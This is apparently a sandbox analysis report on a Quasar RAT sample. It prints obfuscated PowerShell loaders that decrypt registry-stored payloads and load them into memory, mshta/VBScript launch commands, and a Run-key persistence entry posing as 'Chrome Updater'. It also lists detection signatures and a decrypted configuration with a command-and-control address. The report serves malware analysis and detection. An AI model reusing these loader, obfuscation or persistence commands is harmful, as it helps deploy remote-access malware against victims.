0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlBNKsBNKxBNKMBNKgBNK)BNK'.Replace('BNK', ''); $Zm4Vl=$wG2gl.CreateDecryptor(); $K78Uv=$Zm4Vl.TransformFinalBlock($gsleS, $u2Okr, $gsleS.Length); $Zm4Vl.Dispose(); $wG2gl.Dispose(); $K78Uv; } Invoke-Expression -WarningAction Inquire -InformationAction Ignore 'S20$S20XS20vS20IS20hS20uS20=S20[S20MS20iS20cS20rS20oS20sS20oS20fS20tS20.S20WS20iS20nS203S202S20.S20RS20eS20gS20iS20sS20tS20rS20yS20]S20:S20:S20CS20uS20rS20rS20eS20nS20tS20US20sS20eS20rS20.S20OS20pS20eS20nS20SS20uS20bS20KS20eS20yS20(S20$S20gS20YS20qS20oS20pS20,S20$S20dS20XS20sS203S20RS20)S20'.Replace('S20', ''); $xkuqv = $XvIhu.GetValue($QR3m4); $v7kJF = $XvIhu.GetValue($Q21ag); $v7kJF = juypb($v7kJF); $xkuqv = juypb($xkuqv); Invoke-Expression -InformationAction Ignore -Verbose 'R1F$R1FER1FtR1FDR1FUR1FUR1F=R1F[R1FRR1FeR1FfR1FlR1FeR1FcR1FtR1FiR1FoR1FnR1F.R1FAR1FsR1FsR1FeR1FmR1FbR1FlR1FyR1F]R1F:R1F:R1FLR1FoR1FaR1FdR1F(R1F[R1FbR1FyR1FtR1FeR1F[R1F]R1F]R1F$R1FxR1FkR1FuR1FqR1FvR1F)R1F'.Replace('R1F', ''); $L68BO = $EtDUU.EntryPoint; $L68BO.Invoke($u2Okr,$gnS0E); Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire 'SAi$SAirSAikSAiESAitSAitSAi=SAi[SAiRSAieSAifSAilSAieSAicSAitSAiiSAioSAinSAi.SAiASAisSAisSAieSAimSAibSAilSAiySAi]SAi:SAi:SAiLSAioSAiaSAidSAi(SAi[SAibSAiySAitSAieSAi[SAi]SAi]SAi$SAivSAi7SAikSAiJSAiFSAi)SAi'.Replace('SAi', ''); $dY9Oo = $rkEtt.EntryPoint; $dY9Oo.Invoke($u2Okr,$gnS0E);}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 1076 cmdline: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 2832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 7404 cmdline: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.powershell.exe.225576fb380.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
              8.2.powershell.exe.225576d3348.3.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                8.2.powershell.exe.225576d3348.3.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                  8.2.powershell.exe.2255fa80000.8.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                    8.2.powershell.exe.2255fa80000.8.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                      Click to see the 21 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: MSHTA Suspicious Execution 01
                      Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), CommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), ProcessId: 1076, ProcessName: mshta.exe
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1076, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg'), ProcessId: 2832, ProcessName: powershell.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", ProcessId: 7956, ProcessName: wscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wbem\WmiPrvSE.exe, ProcessId: 8116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Updater
                      Sigma detected: Suspicious Powershell In Registry Run Keys
                      Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: mshta vbscript:Execute("D2h=strreverse(""llehS.tpircsW""):Set XAr=CreateObject(D2h):XAr.Run ""powershell.exe -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')"", 0:Close"), EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wbem\WmiPrvSE.exe, ProcessId: 8116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Updater
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs", ProcessId: 7956, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrl3mal3mpl3mhl3myl3m.l3mCl3mil3mpl3mhl3mel3mr

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-11T17:32:38.586864+010018100091Potentially Bad Traffic192.168.2.1049797149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Yara detected Quasar RAT
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576d3348.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.225576fb380.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2800661538.000002255FA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225576FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2591788897.0000022548849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.2% probability
                      Sample uses string decryption to hide its real strings
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: 1.8.8
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: 193.124.205.6:443;
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: SubDir
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: Client.exe
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: 615456d8-1d6d-425c-ab75-75d0b24fbc45
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: Quasar Client Startup
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: adsforDex
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: Firewall
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: ELbnuzl0hYQ8L5qkz3PeI0jYPNEL58LrqN29UIUQ0XG1nHp3mkvYboeGLU7S3qmf4m28r/9Faqc71mIKHIV2cRr7wUcSaviBG1WsxQqFVgFw9+d/HWwNcH0EodGoCClMkwszWSUqw8wq18s4ByLpBFEXp23rDma0hwbGEJ73X1YxNFPYv7M/YOv1v4AcLe2kTDayG8opnRf4FKinqMI8luFSCTX/Rc8u3u8MlbFekd4FSaAL+iTpowBvfN0vKzy5eeIaDlkwvqmPpbDDkxwgooSjwBAbs3tCZrduXO5gcOxbwkME0P3Lghrv1/5J6tXnC4Slh4XoR5rpzuLCHBmjnd5Aoxwk4HYGn+yckJ7qBEcstbgKbpYGvxjYNFDFr5lkzh0m1TlbInBmeKRz+YcQpuBNy1s6nwbjl4haPRCOf1iqR3sHrRzX7BRMYFll0jaJRbGNBBB+GPtOQnQsXPqnifpexfX8CBI8eHIimoBCRXwHVDlj7oCCrFr86gz25k8SaoHFTmPuKNz2bC3Lc8+JRc6al8R+KPNKPCYSlNW1lrzlb7xzWHtnhj8R16bXcazYLDBzf+TXBx80d6s2G3awYSGL1Yd/J830XZncKFBBzulnaa1D5k55dzHtp8qKPc3n10QGJIirImzjMxtd+KU3fEAaE2A8YfWSzqJkL6+lW7D4tZQ3cfNFI2xKVwXrRGpWKiBzqqjhK6jELcpOKsj9VtT3GJbfEVlcx1IQpuVdt5wd0B0yhLvD+fHPESssS/x2RRlec5dLGaOiS1ugNy5uYsc4kquI7/4cMR1T1rpBRmDaZISM1kUbOIhvokfCkCwDbMH14+Q7uG7KNSn2+LNzf1Om/gSXeiyRJX2w+cphlSpieq8T59nN2gQA21U3GJ6byb73JWSbCtTGvaj+5lU7/XBBfmGdLnbqZacb3Itt+uj/mbEwRoZ+StjQc3wdssW9NfZtc5DOlNU4iSou9bv8Pqecr3d1Q9DgtuM3pzCn56nby54niBsS7WYcF3o+6FT/zlzecO1964xPoqB/VhdC8NfVK7zJVDJ8DjQ/Dp0nspBKPzAn9isMnXuIFd3sRgM+SGwqrqzWRBZdvTgDRdbTOsXIT4UjeocZubudKXP04ONPAKJhmG0jnByETwFULkbL4W8EzBoxWb5nfgdNMAr00JU16RGEdjdveo69uRTDkxFIw40YGl6SeALrORUQLnGhRyGXZGZv6Kmhk+Qw5DdQ2kT1aYZUbo9yV/Dml9A5c9qlM6xxOIAqlEjX+zpCW1uS4dFrqnqe2pZNaIRGhhKKHeP23qx5MB0EDVK6Hr+bAbo+GTt5Ds+L+AEK0KNN/ITaKWo1TssyTA/3w6sulzpgJQ==
                      Source: 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmpString decryptor: MIIJOTCCBSGgAwIBAgIYMqZeKdPzz5y3sj5tDfnNSjx0NMGPqO0HMA0GCSqGSIb3DQEBCwUAMCExHzAdBgNVBAMMFkpPWVVTTz1oamtkYXNoamtzZGFqa2gwIBcNMjUwMjAyMjA1NDI1WhgPMjA3NTAyMDMyMjAxMzFaMCExHzAdBgNVBAMMFkpPWVVTTz1oamtkYXNoamtzZGFqa2gwggQiMA0GCSqGSIb3DQEBAQUAA4IEDwAwggQKAoIEAQCbsQRZSBNs05uhF7YZV2vdSdOSCDms6G88eQyxaxo8SfihsWIDElbo7j4w/dkf5hASswja6g8Fy5zognfFzMo+N87V3lm1iBkE3AZvrqSkNGyLbtjdsJLAZu5ovVukqMXYuEGwfVwzrksrXdVfJCXYLbun+51sxiFnGz5yRFz1VxfcS+f8fQhVFmJGcaayBlnd/MaW7Y9M7DsHPhO44uI9SdiIFS4UEm8s2Aaf3bdpnfQMp4cnlT9tcmJEbFkfxpoStjf9OHDdgeFrkfGbEpcRBYvSqzYmKMnolq+9Ogfa8WmyYUs3qJvTeCqqPMXZ6lfcsnWTfXMuQXPb8tUbHtjgjKMvGTTmwrV6EBJ3NuiLBYMOCFMM9C3t/JUi6qWUy76EO3lkit1dhV2FhLWWnJy0OGdR4U1X8z3Fd+lAQ3HF7oqvPkvmwsXpwBFRSvZ/mnKMPb/zZqbzL7xVOSLm3WN/GKMusBJuvq+VS3kIyywFBX3yX9CwUWp1bi+HfcP6MDODVLuPzSnIjBLrUAKkSxLSsOIaP+sc2dpfzljKUq+30wqSrQ7ofvc1Lt9uI6X2u4/ThvsTFgamyo2whiiwyh2GNAmDtiG05KNaV7DzFDsaAZylG1Xjc0rd+4eJIBM0E114afSXt5DI6eTqqe/TbOr74HOTgcW3ulzysNcjP1vqAn2SlH7eG8CZZxLpdOBrL6UrKuTJCFu9TbubvdrZaIvqfvlJVWJ+KhANimL/Py8DowUEYzgkuUCe/gZYSLZ45K4vpoTjQJ0ZioPBE9XMJtZSL4Q2U4on/m0GWzFb8meI01+YsqpVTArd746wLRTOFnXODjkSJNSLD3McQhcYnJ1QlV3PO+anq4NFLe+wLo+ji9Nx6MF3CfcAaCCTfNYH7DEGn4y9cro13OGxPeHkCVj2uTaVsCj2O4P2mb9VF4Vfh9eFd1B1otkHHRhwBMXykY+TSRVaNLj0UfyT2YiW4cxPBHrlN97KrSlGifRq2h+uZupxnvd3hgpfX5FQeBhwl54BiGIraSoBc0iidnym+YMynsWI4YDTn/ptmssCrMM06C9ZKghvaynWBII9QVNQic0Ga0sSoTxJzkXDwzHdly1q+gHStW4kVO64Q+VCNstF0vdhYVjR8tGHgQJBnQW4wElSWhUTs8nUOHERChBsfohxtOAzLjJxkSHtE19aomyxn+nmsiQ7CQLPca4in0CyXGzdWNjaWs/6BlR7hHQqXfVJ1poMRcPoXh555cGbczz7y/2BaWVXRXQIhcUGoUwPgYzjIwverrD8A/F4UfDE4C3pVAIzMee7Fy+uM7cNgJ1NDrHP1TYr3+7eydt9I5gDCa7Obsh6YcJym1DNGIjVTdSvAgMBAAGjYzBhMB0GA1UdDgQWBBSo0Hpfq3FwH72Bca0itpByT+9g2TAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIBBjAfBgNVHSMEGDAWgBSo0Hpfq3FwH72Bca0itpByT+9g2TANBgkqhkiG9w0BAQsFAA